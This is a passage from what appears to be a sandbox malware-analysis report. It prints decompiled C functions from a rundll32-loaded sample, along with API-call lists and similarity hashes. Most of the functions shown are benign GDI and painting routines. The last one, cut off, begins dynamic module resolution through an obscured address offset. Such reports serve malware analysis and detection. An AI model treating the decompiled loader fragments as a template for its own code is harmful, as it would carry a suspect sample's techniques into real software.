                          • MessageBoxA.USER32 ref: 00E13F64
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: FileHandleWrite$Message
                          • String ID: Error$Runtime error at 00000000
                          • API String ID: 1570097196-2970929446
                          • Opcode ID: 216035f248471bd1f135d7dd632a181cde9cb3acb31599840e0b30a9fd676216
                          • Instruction ID: 3d09044c67a5886da1959682e58a59b9859179e5d4fcc55420d680f60b1e07d0
                          • Opcode Fuzzy Hash: 216035f248471bd1f135d7dd632a181cde9cb3acb31599840e0b30a9fd676216
                          • Instruction Fuzzy Hash: F0F09675B44380B8E620E760BC06FD921AC5748F28F24A259F228F50F387B045C5E662
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			E00E316B4(void* __ebx) {
                          				struct HDC__* _v8;
                          				struct tagPALETTEENTRY _v1000;
                          				struct tagPALETTEENTRY _v1004;
                          				struct tagPALETTEENTRY _v1032;
                          				signed int _v1034;
                          				short _v1036;
                          				void* _t24;
                          				int _t53;
                          				intOrPtr _t60;
                          				void* _t62;
                          				void* _t63;
                          
                          				_t62 = _t63;
                          				_v1036 = 0x300;
                          				_v1034 = 0x10;
                          				E00E128C8(_t24, 0x40,  &_v1032);
                          				_v8 = GetDC(0);
                          				_push(_t62);
                          				_push(0xe317b1);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t63 + 0xfffffbf8;
                          				_t53 = GetDeviceCaps(_v8, 0x68);
                          				if(_t53 >= 0x10) {
                          					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
                          					if(_v1004 != 0xc0c0c0) {
                          						GetSystemPaletteEntries(_v8, _t53 - 8, 8, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                          					} else {
                          						GetSystemPaletteEntries(_v8, _t53 - 8, 1,  &_v1004);
                          						GetSystemPaletteEntries(_v8, _t53 - 7, 7, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                          						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
                          					}
                          				}
                          				_pop(_t60);
                          				 *[fs:eax] = _t60;
                          				_push(0xe317b8);
                          				return ReleaseDC(0, _v8);
                          			}

                          0x00e316b5
                          0x00e316be
                          0x00e316c7
                          0x00e316db
                          0x00e316e7
                          0x00e316ec
                          0x00e316ed
                          0x00e316f2
                          0x00e316f5
                          0x00e31703
                          0x00e31708
                          0x00e3171d
                          0x00e3172c
                          0x00e31793
                          0x00e3172e
                          0x00e31741
                          0x00e3175f
                          0x00e31773
                          0x00e31773
                          0x00e3172c
                          0x00e3179a
                          0x00e3179d
                          0x00e317a0
                          0x00e317b0

                          APIs
                          • GetDC.USER32(00000000), ref: 00E316E2
                          • GetDeviceCaps.GDI32(?,00000068), ref: 00E316FE
                          • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00E3171D
                          • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 00E31741
                          • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 00E3175F
                          • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 00E31773
                          • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00E31793
                          • ReleaseDC.USER32 ref: 00E317AB
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: EntriesPaletteSystem$CapsDeviceRelease
                          • String ID:
                          • API String ID: 1781840570-0
                          • Opcode ID: 5fe8085485f9a709313544c25bfe180ee8851212799ff6e0041233f913016e57
                          • Instruction ID: fa41f0b8293c488f4e5ba6d6a632e6f05acdccd23f3339116442751b00624006
                          • Opcode Fuzzy Hash: 5fe8085485f9a709313544c25bfe180ee8851212799ff6e0041233f913016e57
                          • Instruction Fuzzy Hash: D8212CB5A40208AAEB10DBA4CD86FAE77FCEB09704F901595F704FA181D675AE84DB24
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 86%
                          			E00E5AC94(intOrPtr* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                          				intOrPtr* _v8;
                          				char _v12;
                          				int _v16;
                          				int _v20;
                          				struct tagPAINTSTRUCT _v84;
                          				intOrPtr _t55;
                          				void* _t64;
                          				struct HDC__* _t75;
                          				intOrPtr _t84;
                          				void* _t95;
                          				void* _t96;
                          				void* _t98;
                          				void* _t100;
                          				void* _t101;
                          				intOrPtr _t102;
                          
                          				_t100 = _t101;
                          				_t102 = _t101 + 0xffffffb0;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_t3 =  &_v12; // 0xe4263e
                          				_t75 =  *( *_t3 + 4);
                          				if(_t75 == 0) {
                          					_t75 = BeginPaint(E00E5CFE0(_v8),  &_v84);
                          				}
                          				_push(_t100);
                          				_push(0xe5adb4);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t102;
                          				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
                          					_v20 = SaveDC(_t75);
                          					_v16 = 2;
                          					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
                          					if(_t95 >= 0) {
                          						_t96 = _t95 + 1;
                          						_t98 = 0;
                          						do {
                          							_t64 = E00E2707C( *((intOrPtr*)(_v8 + 0x198)), _t98);
                          							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
                          								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
                          									goto L11;
                          								} else {
                          									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
                          									if(_v16 != 1) {
                          										goto L11;
                          									}
                          								}
                          							} else {
                          								goto L11;
                          							}
                          							goto L12;
                          							L11:
                          							_t98 = _t98 + 1;
                          							_t96 = _t96 - 1;
                          						} while (_t96 != 0);
                          					}
                          					L12:
                          					if(_v16 != 1) {
                          						 *((intOrPtr*)( *_v8 + 0xb8))();
                          					}
                          					RestoreDC(_t75, _v20);
                          				} else {
                          					 *((intOrPtr*)( *_v8 + 0xb8))();
                          				}
                          				E00E5ADEC(_v8, 0, _t75);
                          				_pop(_t84);
                          				 *[fs:eax] = _t84;
                          				_push(0xe5adbb);
                          				_t41 =  &_v12; // 0xe4263e
                          				_t55 =  *_t41;
                          				if( *((intOrPtr*)(_t55 + 4)) == 0) {
                          					return EndPaint(E00E5CFE0(_v8),  &_v84);
                          				}
                          				return _t55;
                          			}

                          APIs
                          • BeginPaint.USER32(00000000,?), ref: 00E5ACBA
                          • SaveDC.GDI32(?), ref: 00E5ACEE
                          • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 00E5AD50
                          • RestoreDC.GDI32(?,00E42617), ref: 00E5AD7A
                          • EndPaint.USER32(00000000,?,00E5ADBB), ref: 00E5ADAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                          • String ID: >&
                          • API String ID: 3808407030-693758915
                          • Opcode ID: 386a9302a2956a87c2417e2ebd78154ada4b6580391098c73af7d40538050e5d
                          • Instruction ID: da25ba74a76a650239f56dc3be0b8dfe8d266e551617743d9e788de9ce154e64
                          • Opcode Fuzzy Hash: 386a9302a2956a87c2417e2ebd78154ada4b6580391098c73af7d40538050e5d
                          • Instruction Fuzzy Hash: F9418270A002049FC714EF98C885FADB7F9EF4830AF1995B8E904A7266D731DD48CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E00E339C8(void* __eax, void* __edx) {
                          				BYTE* _v8;
                          				int _v12;
                          				struct HDC__* _v16;
                          				short _v18;
                          				signed int _v24;
                          				short _v26;
                          				short _v28;
                          				char _v38;
                          				void* __ebx;
                          				void* __ebp;
                          				signed int _t35;
                          				void* _t66;
                          				intOrPtr _t68;
                          				intOrPtr _t78;
                          				void* _t81;
                          				void* _t84;
                          				void* _t86;
                          				intOrPtr _t87;
                          
                          				_t84 = _t86;
                          				_t87 = _t86 + 0xffffffdc;
                          				_t81 = __edx;
                          				_t66 = __eax;
                          				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
                          					return __eax;
                          				} else {
                          					E00E12C80( &_v38, 0x16);
                          					_t68 =  *((intOrPtr*)(_t66 + 0x28));
                          					_v38 = 0x9ac6cdd7;
                          					_t35 =  *((intOrPtr*)(_t68 + 0x18));
                          					if(_t35 != 0) {
                          						_v24 = _t35;
                          					} else {
                          						_v24 = 0x60;
                          					}
                          					_v28 = MulDiv( *(_t68 + 0xc), _v24 & 0x0000ffff, 0x9ec);
                          					_v26 = MulDiv( *(_t68 + 0x10), _v24 & 0x0000ffff, 0x9ec);
                          					_v18 = E00E31EBC( &_v38);
                          					_v16 = GetDC(0);
                          					_push(_t84);
                          					_push(0xe33b03);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t87;
                          					_v12 = GetWinMetaFileBits( *(_t68 + 8), 0, 0, 8, _v16);
                          					_v8 = E00E126CC(_v12);
                          					_push(_t84);
                          					_push(0xe33ae3);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t87;
                          					if(GetWinMetaFileBits( *(_t68 + 8), _v12, _v8, 8, _v16) < _v12) {
                          						E00E310CC(_t68);
                          					}
                          					E00E2910C(_t81, 0x16,  &_v38);
                          					E00E2910C(_t81, _v12, _v8);
                          					_pop(_t78);
                          					 *[fs:eax] = _t78;
                          					_push(0xe33aea);
                          					return E00E126EC(_v8);
                          				}
                          			}

                          APIs
                          • MulDiv.KERNEL32(?,?,000009EC), ref: 00E33A1A
                          • MulDiv.KERNEL32(?,?,000009EC), ref: 00E33A31
                          • GetDC.USER32(00000000), ref: 00E33A48
                          • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,00E33B03,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00E33A6C
                          • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,00E33AE3,?,?,00000000,00000000,00000008,?,00000000,00E33B03), ref: 00E33A9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: BitsFileMeta
                          • String ID: `
                          • API String ID: 858000408-2679148245
                          • Opcode ID: 48c57459ba4f751f3bff0284b144b06e6243ba9c9def7aeeb6476ed2595fa79c
                          • Instruction ID: 3887a70dc9d96362379d2f036113f23d3bbe84d60e30bf16d5743e6a2caa9ab9
                          • Opcode Fuzzy Hash: 48c57459ba4f751f3bff0284b144b06e6243ba9c9def7aeeb6476ed2595fa79c
                          • Instruction Fuzzy Hash: D9315C75A00208ABDB00EFE4C886EEEBBF8EF49700F515495F904FB281D6759E50DBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E00E3404C(int __eax, void* __ecx, intOrPtr __edx) {
                          				intOrPtr _v8;
                          				struct HDC__* _v12;
                          				struct HDC__* _v16;
                          				void* _v20;
                          				struct tagRGBQUAD _v1044;
                          				int _t16;
                          				int _t37;
                          				intOrPtr _t44;
                          				void* _t46;
                          				void* _t49;
                          				void* _t51;
                          				intOrPtr _t52;
                          
                          				_t16 = __eax;
                          				_t49 = _t51;
                          				_t52 = _t51 + 0xfffffbf0;
                          				_v8 = __edx;
                          				_t46 = __eax;
                          				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                          					L4:
                          					return _t16;
                          				} else {
                          					_t16 = E00E31908(_v8, 0xff,  &_v1044);
                          					_t37 = _t16;
                          					if(_t37 == 0) {
                          						goto L4;
                          					} else {
                          						_v12 = GetDC(0);
                          						_v16 = CreateCompatibleDC(_v12);
                          						_v20 = SelectObject(_v16, _t46);
                          						_push(_t49);
                          						_push(0xe340fb);
                          						_push( *[fs:eax]);
                          						 *[fs:eax] = _t52;
                          						SetDIBColorTable(_v16, 0, _t37,  &_v1044);
                          						_pop(_t44);
                          						 *[fs:eax] = _t44;
                          						_push(0xe34102);
                          						SelectObject(_v16, _v20);
                          						DeleteDC(_v16);
                          						return ReleaseDC(0, _v12);
                          					}
                          				}
                          			}

                          APIs
                            • Part of subcall function 00E31908: GetObjectA.GDI32(?,00000004), ref: 00E3191F
                            • Part of subcall function 00E31908: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 00E31942
                          • GetDC.USER32(00000000), ref: 00E3408A
                          • CreateCompatibleDC.GDI32(?), ref: 00E34096
                          • SelectObject.GDI32(?), ref: 00E340A3
                          • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00E340FB,?,?,?,?,00000000), ref: 00E340C7
                          • SelectObject.GDI32(?,?), ref: 00E340E1
                          • DeleteDC.GDI32(?), ref: 00E340EA
                          • ReleaseDC.USER32 ref: 00E340F5
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                          • String ID:
                          • API String ID: 4046155103-0
                          • Opcode ID: bd2dd37a31041b6dd85c0e6e04a15d17eb34c930f719c891eac4fdf7b8bd9278
                          • Instruction ID: a83845be0e6e54c2895873e9a3285c3ef834a87b598e42ba27d971d4922bf03c
                          • Opcode Fuzzy Hash: bd2dd37a31041b6dd85c0e6e04a15d17eb34c930f719c891eac4fdf7b8bd9278
                          • Instruction Fuzzy Hash: DC111FB1E056196BDB11EBE48856AAEB7FCEB08700F4158A5B604F7281DA74AD80CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E00E42470(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                          				intOrPtr* _v8;
                          				intOrPtr* _v12;
                          				struct HDC__* _v16;
                          				struct tagPAINTSTRUCT _v80;
                          				struct tagRECT _v96;
                          				struct tagRECT _v112;
                          				signed int _v116;
                          				long _v120;
                          				void* __ebp;
                          				void* _t68;
                          				void* _t94;
                          				struct HBRUSH__* _t97;
                          				intOrPtr _t105;
                          				void* _t118;
                          				void* _t127;
                          				intOrPtr _t140;
                          				intOrPtr _t146;
                          				void* _t147;
                          				void* _t148;
                          				void* _t150;
                          				void* _t152;
                          				intOrPtr _t153;
                          
                          				_t148 = __esi;
                          				_t147 = __edi;
                          				_t138 = __edx;
                          				_t127 = __ebx;
                          				_t150 = _t152;
                          				_t153 = _t152 + 0xffffff8c;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_t68 =  *_v12 - 0xf;
                          				if(_t68 == 0) {
                          					_v16 =  *(_v12 + 4);
                          					if(_v16 == 0) {
                          						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
                          					}
                          					_push(_t150);
                          					_push(0xe4263e);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t153;
                          					if(_v16 == 0) {
                          						GetWindowRect( *(_v8 + 0x254),  &_v96);
                          						E00E56470(_v8,  &_v120,  &_v96);
                          						_v96.left = _v120;
                          						_v96.top = _v116;
                          						E00E55268( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
                          					}
                          					E00E5AC94(_v8, _t127, _v12, _t147, _t148);
                          					_pop(_t140);
                          					 *[fs:eax] = _t140;
                          					_push(0xe4264c);
                          					if(_v16 == 0) {
                          						return EndPaint( *(_v8 + 0x254),  &_v80);
                          					}
                          					return 0;
                          				} else {
                          					_t94 = _t68 - 5;
                          					if(_t94 == 0) {
                          						_t97 = E00E30724( *((intOrPtr*)(_v8 + 0x170)));
                          						 *((intOrPtr*)( *_v8 + 0x44))();
                          						FillRect( *(_v12 + 4),  &_v112, _t97);
                          						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
                          							GetClientRect( *(_v8 + 0x254),  &_v96);
                          							FillRect( *(_v12 + 4),  &_v96, E00E30724( *((intOrPtr*)(_v8 + 0x170))));
                          						}
                          						_t105 = _v12;
                          						 *((intOrPtr*)(_t105 + 0xc)) = 1;
                          					} else {
                          						_t118 = _t94 - 0x2b;
                          						if(_t118 == 0) {
                          							E00E423E4(_t150);
                          							_t105 = _v8;
                          							if( *((char*)(_t105 + 0x22f)) == 2) {
                          								if(E00E4290C(_v8) == 0 || E00E42430(_t138, _t150) == 0) {
                          									_t146 = 1;
                          								} else {
                          									_t146 = 0;
                          								}
                          								_t105 = E00E3F750( *(_v8 + 0x254), _t146);
                          							}
                          						} else {
                          							if(_t118 != 0x45) {
                          								_t105 = E00E423E4(_t150);
                          							} else {
                          								E00E423E4(_t150);
                          								_t105 = _v12;
                          								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
                          									_t105 = _v12;
                          									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
                          								}
                          							}
                          						}
                          					}
                          					return _t105;
                          				}
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$FillPaintWindow$BeginCallClientProc
                          • String ID:
                          • API String ID: 901200654-0
                          • Opcode ID: 49bd62d265c5b35ca69c864b430260be0c82db1f7c8b68c87904c93b7913d5c6
                          • Instruction ID: dfc2c47f37f64b1f57badbaa92840806e3a60121daf2fa4f1b7a279ceb0ad6e6
                          • Opcode Fuzzy Hash: 49bd62d265c5b35ca69c864b430260be0c82db1f7c8b68c87904c93b7913d5c6
                          • Instruction Fuzzy Hash: 4451F974E00108EFCB00DBA8D989E9DB7F9AF48314F9591A9F508FB262D734AE45CB14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E00E2864C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr* _v8;
                          				char _v12;
                          				char _v16;
                          				void* _t36;
                          				void* _t49;
                          				CHAR* _t50;
                          				void* _t60;
                          				void* _t71;
                          				char _t72;
                          				char _t73;
                          				intOrPtr _t88;
                          				CHAR* _t91;
                          				CHAR** _t94;
                          				void* _t95;
                          				void* _t96;
                          				void* _t97;
                          				intOrPtr _t98;
                          
                          				_t96 = _t97;
                          				_t98 = _t97 + 0xfffffff4;
                          				_v16 = 0;
                          				_t71 = __edx;
                          				_v8 = __eax;
                          				_t94 =  &_v12;
                          				 *[fs:eax] = _t98;
                          				E00E27ACC(_v8);
                          				 *[fs:eax] = _t98;
                          				 *((intOrPtr*)( *_v8 + 0x44))( *[fs:eax], 0xe2877e, _t96,  *[fs:eax], 0xe2879b, _t96, __edi, __esi, __ebx, _t95);
                          				 *_t94 = E00E14528(_t71);
                          				while( *( *_t94) - 0xffffffffffffffe1 < 0) {
                          					 *_t94 = CharNextA( *_t94);
                          				}
                          				while(1) {
                          					_t72 =  *( *_t94);
                          					if(_t72 == 0) {
                          						break;
                          					}
                          					_t36 = E00E287C4(_v8);
                          					__eflags = _t72 - _t36;
                          					if(_t72 != _t36) {
                          						_t91 =  *_t94;
                          						while(1) {
                          							_t73 =  *( *_t94);
                          							__eflags = _t73 - 0x20;
                          							if(_t73 <= 0x20) {
                          								break;
                          							}
                          							_t60 = E00E287AC(_v8);
                          							__eflags = _t73 - _t60;
                          							if(_t73 != _t60) {
                          								 *_t94 = CharNextA( *_t94);
                          								continue;
                          							}
                          							break;
                          						}
                          						__eflags =  *_t94 - _t91;
                          						E00E14158( &_v16,  *_t94 - _t91, _t91,  *_t94 - _t91);
                          						L11:
                          						 *((intOrPtr*)( *_v8 + 0x38))();
                          						while(1) {
                          							__eflags =  *( *_t94) - 0xffffffffffffffe1;
                          							if( *( *_t94) - 0xffffffffffffffe1 >= 0) {
                          								break;
                          							}
                          							 *_t94 = CharNextA( *_t94);
                          						}
                          						_t49 = E00E287AC(_v8);
                          						__eflags = _t49 -  *( *_t94);
                          						if(_t49 !=  *( *_t94)) {
                          							continue;
                          						}
                          						_t50 = CharNextA( *_t94);
                          						__eflags =  *_t50;
                          						if( *_t50 == 0) {
                          							__eflags = 0;
                          							 *((intOrPtr*)( *_v8 + 0x38))();
                          						}
                          						do {
                          							 *_t94 = CharNextA( *_t94);
                          							__eflags =  *( *_t94) - 0xffffffffffffffe1;
                          						} while ( *( *_t94) - 0xffffffffffffffe1 < 0);
                          						continue;
                          					}
                          					E00E180C0(_t94,  &_v16, E00E287C4(_v8));
                          					goto L11;
                          				}
                          				_pop(_t88);
                          				 *[fs:eax] = _t88;
                          				_push(0xe28785);
                          				return E00E27B88(_v8);
                          			}

                          Address column (one code address per decompiled line above, detached from the code by extraction): 0x00e2864d .. 0x00e2877d

                          APIs
                          • CharNextA.USER32(?,?,00000000,00E2879B), ref: 00E2869C
                          • CharNextA.USER32(?,?,00000000,00E2879B), ref: 00E28714
                          • CharNextA.USER32(?,?,?,00000000,00E2879B), ref: 00E28735
                          • CharNextA.USER32(00000000,?,?,?,00000000,00E2879B), ref: 00E2874C
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CharNext
                          • String ID:
                          • API String ID: 3213498283-3916222277
                          • Opcode ID: 9f6518f38635723cdba7a7c8e2d63bb16305239836408114754a76f863ff8134
                          • Instruction ID: aaa6ffc12eb5da2b7a976e42bec9cc12b3c9ecc068eb2a2f64fab80e52608b61
                          • Opcode Fuzzy Hash: 9f6518f38635723cdba7a7c8e2d63bb16305239836408114754a76f863ff8134
                          • Instruction Fuzzy Hash: 01418B74A01158DFDB21EF68DA91899B7F5EF5A30072828AAF481EB351CB30AD41DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 81%
                          			E00E31BB4(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int* _a4, signed int* _a8) {
                          				intOrPtr* _v8;
                          				intOrPtr _v12;
                          				signed int _v16;
                          				intOrPtr _v20;
                          				signed int _v24;
                          				signed int _v32;
                          				struct HDC__* _v44;
                          				signed int* _t36;
                          				signed int _t39;
                          				signed int _t42;
                          				signed int* _t52;
                          				signed int _t56;
                          				intOrPtr _t66;
                          				void* _t72;
                          				void* _t73;
                          				void* _t74;
                          				intOrPtr _t75;
                          
                          				_t73 = _t74;
                          				_t75 = _t74 + 0xffffff90;
                          				_v16 = __ecx;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_t52 = _a8;
                          				_v24 = _v16 << 4;
                          				_v20 = E00E17E34(_v24, __eflags);
                          				 *[fs:edx] = _t75;
                          				_t56 = _v24;
                          				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0xe31eab, _t73, __edi, __esi, __ebx, _t72);
                          				if(( *_t52 | _t52[1]) != 0) {
                          					_t36 = _a4;
                          					 *_t36 =  *_t52;
                          					_t36[1] = _t52[1];
                          				} else {
                          					 *_a4 = GetSystemMetrics(0xb); // SM_CXICON: default icon width
                          					_a4[1] = GetSystemMetrics(0xc); // SM_CYICON: default icon height
                          				}
                          				_v44 = GetDC(0);
                          				if(_v44 == 0) {
                          					E00E31078(_t56);
                          				}
                          				_push(_t73);
                          				_push(0xe31c9d);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t75;
                          				_t39 = GetDeviceCaps(_v44, 0xe); // PLANES
                          				_t42 = _t39 * GetDeviceCaps(_v44, 0xc); // PLANES * BITSPIXEL = colour depth of the screen DC
                          				if(_t42 <= 8) {
                          					__eflags = 1;
                          					_v32 = 1 << _t42; // palettised display: number of colours
                          				} else {
                          					_v32 = 0x7fffffff; // true-colour display: colour count treated as unbounded
                          				}
                          				_pop(_t66);
                          				 *[fs:eax] = _t66;
                          				_push(0xe31ca4);
                          				return ReleaseDC(0, _v44);
                          			}

                          Address column (one code address per decompiled line above, detached from the code by extraction): 0x00e31bb5 .. 0x00e31c9c

                          APIs
                          • GetSystemMetrics.USER32 ref: 00E31C02
                          • GetSystemMetrics.USER32 ref: 00E31C0E
                          • GetDC.USER32(00000000), ref: 00E31C2A
                          • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00E31C51
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E31C5E
                          • ReleaseDC.USER32 ref: 00E31C97
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CapsDeviceMetricsSystem$Release
                          • String ID:
                          • API String ID: 447804332-0
                          • Opcode ID: 3b53b0a30b27b84aba9727ab401567d5749cdf03b1dff42e875fc8fe2c921dbb
                          • Instruction ID: 0db627d2c0799934effd5fa8f7212c3ca29f40c0cba0dcc712935bca1f0f07e9
                          • Opcode Fuzzy Hash: 3b53b0a30b27b84aba9727ab401567d5749cdf03b1dff42e875fc8fe2c921dbb
                          • Instruction Fuzzy Hash: 71314F74A002049FDB04DF64C995AEDFFF5FB89710F50A5A9E814BB390C670AD41CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0108111A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                          				intOrPtr _v8;
                          				_Unknown_base(*)()* _t29;
                          				_Unknown_base(*)()* _t33;
                          				_Unknown_base(*)()* _t36;
                          				_Unknown_base(*)()* _t39;
                          				_Unknown_base(*)()* _t42;
                          				intOrPtr _t46;
                          				struct HINSTANCE__* _t50;
                          				intOrPtr _t56;
                          
                          				_t56 = E01081B28(0x20); // 0x20-byte context from the heap (HeapAlloc, see the APIs list below)
                          				if(_t56 == 0) {
                          					_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                          				} else {
                          					_t50 = GetModuleHandleA( *0x10841d0 + 0x1085014); // *0x10841d0 is a delta added to fixed addresses; the module-name string is not shown in this listing
                          					_v8 = 0x7f; // ERROR_PROC_NOT_FOUND, the result if any lookup below fails
